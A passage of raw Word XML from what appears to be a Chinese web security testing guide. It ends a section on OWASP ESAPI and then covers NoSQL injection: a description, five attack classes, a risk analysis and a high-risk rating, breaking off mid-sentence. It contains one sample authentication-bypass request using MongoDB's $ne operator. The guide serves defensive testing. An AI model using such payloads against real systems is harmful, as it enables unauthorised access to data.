        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>方法三</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ESAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ESAPI (OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>企业安全应用程序接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个免费、开源的、网页应用程序安全控件库，它使程序员能够更容易写出更低风险的程序。</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ESAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口库被设计来使程序员能够更容易的在现有的程序中引入安全因素。</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ESAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库也可以成为作为新程序开发的基础。</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ESAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>详细介绍请参考：</w:t>
      </w:r>
      <w:r w:rsidR="00B76ACF" w:rsidRPr="00B76ACF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://www.owasp.org.cn/owasp-project/ESAPI/</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410F87A6" w14:textId="43310F27" w:rsidR="00B76ACF" w:rsidRPr="00020762" w:rsidRDefault="00B76ACF" w:rsidP="00020762">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E93FFFE" w14:textId="4061B239" w:rsidR="001A7A0B" w:rsidRPr="00F757E4" w:rsidRDefault="001A7A0B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc498434558"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="4385AEE7" w14:textId="418295B3" w:rsidR="001A7A0B" w:rsidRPr="003F0C9B" w:rsidRDefault="001A7A0B" w:rsidP="003F0C9B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00FB6D52" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E76083" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者伪造一个带有注入代码的</w:t>
      </w:r>
      <w:r w:rsidR="00E76083" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00E76083" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问请求，当数据库客户端或协议包装器进行处理时，将会执行预期的非法数据库操作。</w:t>
      </w:r>
      <w:r w:rsidR="007F64BE" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094FFAC9" w14:textId="315F6269" w:rsidR="007F64BE" w:rsidRPr="003F0C9B" w:rsidRDefault="007F64BE" w:rsidP="003F0C9B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="334F353B" wp14:editId="4DC3CECD">
            <wp:extent cx="5400040" cy="2371090"/>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1090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA98E91" w14:textId="70DF1D42" w:rsidR="00CE310E" w:rsidRPr="003F0C9B" w:rsidRDefault="001A7A0B" w:rsidP="003F0C9B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00CE310E" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>NoSQL</w:t>
      </w:r>
      <w:r w:rsidR="00CE310E" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>相关的攻击大致分为以下五类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF30E2" w14:textId="7AF910D3"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重言式</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。又称为永真式。此类攻击是在条件语句中注入代码，使生成的表达式判定结果永远为真，从而绕过认证或访问机制。例如，</w:t>
      </w:r>
      <w:r w:rsidR="00B74683" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r w:rsidR="00B74683" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击，</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>$ne</w:t>
      </w:r>
      <w:r w:rsidR="00B74683" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>（不相等）</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidR="00B74683" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>符</w:t>
      </w:r>
      <w:r w:rsidR="007E269B" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007E269B" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E269B" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造请求</w:t>
      </w:r>
      <w:r w:rsidR="007E269B" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="007E269B" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>www.xxx.com/index.php?username[$ne]=1&amp;password[$ne]=1</w:t>
      </w:r>
      <w:r w:rsidR="007E269B" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00B74683" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过认证</w:t>
      </w:r>
      <w:r w:rsidR="007E269B" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>进入系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219330A2" w14:textId="3A4BF9D3"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联合查询</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。联合查询最常用的用法是绕过认证页面获取数据。通过增加永真的表达式利用布尔</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>运算符进行攻击，从而导致整个语句判定出错，进行非法的数据获取。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BD8B39" w14:textId="77777777"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JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。这是一种新的漏洞，由允许执行数据内容中</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>数据库引入的。</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>使在数据引擎进行复杂事务和查询成为可能。传递不干净的用户输入到这些查询中可以注入任意</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>代码，这会导致非法的数据获取或篡改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5092D16A" w14:textId="77777777"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背负式查询</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。在背负式查询中，攻击者通过利用转义特定字符（比如像回车和换行之类的结束符）插入由数据库额外执行的查询，这样就可以执行任意代码了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78A2D4" w14:textId="77777777"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跨域违规</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>HTTP REST APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>数据库中的一个流行模块，然而，它们引入了一类新的漏洞，它甚至能让攻击者从其他域攻击数据库。在跨域攻击中，攻击者利用合法用户和他们的网页浏览器执行有害的操作。在本文中，我们将展示此类跨站请求伪造（</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>）攻击形式的违规行为，在此网站信任的用户浏览器将被利用在</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>数据库上执行非法操作。通过把</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>格式的代码注入到有漏洞的网站或者欺骗用户进入到攻击者自己的网站上，攻击者可以在目标数据库上执行</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>动作，从而破坏数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32D501" w14:textId="67FCFBEB" w:rsidR="001A7A0B" w:rsidRPr="003F0C9B" w:rsidRDefault="00102E31" w:rsidP="003F0C9B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例详情请参考：</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://www.infoq.com/cn/articles/nosql-injections-analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397FCD09" w14:textId="304418B4" w:rsidR="001A7A0B" w:rsidRPr="003F0C9B" w:rsidRDefault="00C24790" w:rsidP="003F0C9B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="001A7A0B" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00510065" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>在输入</w:t>
      </w:r>
      <w:r w:rsidR="00510065" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00510065" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>和表单处</w:t>
      </w:r>
      <w:r w:rsidR="00510065" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00510065" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>攻击者通过输入精心构造的语句</w:t>
      </w:r>
      <w:r w:rsidR="00510065" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00AE6702" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="00510065" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidR="00AD1F52" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
      <w:r w:rsidR="00510065" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或</w:t>
      </w:r>
      <w:r w:rsidR="00AD1F52" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过认证</w:t>
      </w:r>
      <w:r w:rsidR="00510065" w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E9A237" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="003F0C9B" w:rsidRDefault="001A7A0B" w:rsidP="003F0C9B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0110E9" w14:textId="314CFACF" w:rsidR="001A7A0B" w:rsidRPr="003F0C9B" w:rsidRDefault="004C63AB" w:rsidP="003F0C9B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存在</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003F0C9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
